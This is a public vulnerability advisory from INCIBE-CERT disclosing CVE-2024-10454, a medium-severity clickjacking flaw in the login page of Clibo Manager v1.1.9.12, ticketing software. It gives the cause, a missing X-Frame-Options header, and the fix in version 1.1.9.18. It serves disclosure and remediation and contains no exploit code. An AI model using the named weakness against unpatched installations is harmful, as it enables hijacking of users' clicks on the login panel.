Instituto Nacional de ciberseguridad. Sección Incibe
Instituto Nacional de Ciberseguridad. Sección INCIBE-CERT

Go to Calendar     Go to Press Room     Go to Newsletters subscription

Search

Clickjacking vulnerability in Clibo Manager

Posted date 29/10/2024
Identificador
INCIBE-2024-0536
Importance
3 - Medium
Affected Resources

Clibo Manager, version 1.1.9.12.

Description

INCIBE has coordinated the publication of 1 vulnerability of medium severity affecting Clibo Manager v1.1.9.12, a platform for managing the sale of season tickets, tickets and subscriber management, which has been discovered by David Padilla Alvarado.

This vulnerability has been assigned the following code, CVSS v3.1 base score, CVSS vector and vulnerability type CWE.

  • CVE-2024-10454: CVSS v3.1: 6.1 | CVSS AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N | CWE-1021.
Solution

The vulnerability has been fixed by the Clibo Manager team in version 1.1.9.18.

Detail

CVE-2024-10454: clickjacking vulnerability in Clibo Manager v1.1.9.12 in the '/public/login' directory, a login panel. This vulnerability occurs due to the absence of an X-Frame-Options server-side header. An attacker could overlay a transparent iframe to perform click hijacking on victims.

References list
Ficha de producto
Etiquetas